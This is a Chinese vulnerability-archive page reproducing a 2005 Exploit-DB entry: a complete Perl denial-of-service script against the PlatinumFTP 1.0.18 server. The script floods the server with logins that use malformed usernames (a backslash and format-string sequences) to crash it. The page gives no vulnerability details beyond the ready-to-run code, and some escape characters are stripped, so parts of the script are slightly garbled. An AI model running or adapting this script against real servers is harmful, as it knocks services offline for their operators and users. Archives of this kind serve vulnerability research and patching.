PlatinumFTP 1.0.18 – Multiple Remote Denial of Service Vulnerabilities

PlatinumFTP 1.0.18 – Multiple Remote Denial of Service Vulnerabilities

漏洞ID 1054970 漏洞类型
发布时间 2005-03-17 更新时间 2005-03-17
图片[1]-PlatinumFTP 1.0.18 – Multiple Remote Denial of Service Vulnerabilities-安全小百科CVE编号 N/A
图片[2]-PlatinumFTP 1.0.18 – Multiple Remote Denial of Service Vulnerabilities-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/886
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/perl
#
# pftpdos-ai1.pl - Remote DoS against PlatinumFTP 10.1.18
# Details:http://seclists.org/lists/bugtraq/2005/Mar/0222.html
#
# If you don't get the server down try to change/play a little bit with
# the Timeout
#
# ports at securityforest dot com | greetings to muts, barabas, s|33py,
# revised and all guys at www.whitehat.co.il
#
# Thanks to str0ke from milw0rm for forcing me to shrink 3 PoCs into 1 :)
#
# 2005/05/03 portsonline.net

use strict;
use Net::FTP;

my $host;
my $username;
my $dostype;

if ($#ARGV < 1) { &syntax(); }

$host = $ARGV[0];
$dostype = $ARGV[1];

if ($dostype == '1') { $username = '\'; }
if ($dostype == '2') { $username = '%s%s%s%s'; }
if ($dostype == '3') { $username = '%.1024d'; }

my $ftp = Net::FTP->new($host, Timeout => 2, Debug => 0, Port => 21)
or die "can you see a ftp server? i can't.n";

print "denial of service tpye $dostype in progressn";

while (my $ftp = Net::FTP->new($host, Timeout => 2, Debug => 0, Port => 21))
{
    my $ftp = Net::FTP->new($host, Timeout => 0.1, Debug => 0, Port => 21);
    $ftp->login($username);
}

print "server is down. now run forest, RUN!n";

sub syntax {
    print "Usage: pftpdos-ai1.pl IP DOSTYPE(1-3)nn";
    print "DOSTYPE: 1 Using '\' Username n";
    print "DOSTYPE: 2 Using '%s%s%s%s' Username n";
    print "DOSTYPE: 3 Using '%.1024d' Username n";
    exit (1);
}

# milw0rm.com [2005-03-17]

相关推荐: Cart32 “expdate” Administrative Information Disclosure Vulnerability

Cart32 “expdate” Administrative Information Disclosure Vulnerability 漏洞ID 1104157 漏洞类型 Design Error 发布时间 2000-05-03 更新时间 2000-05-0…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享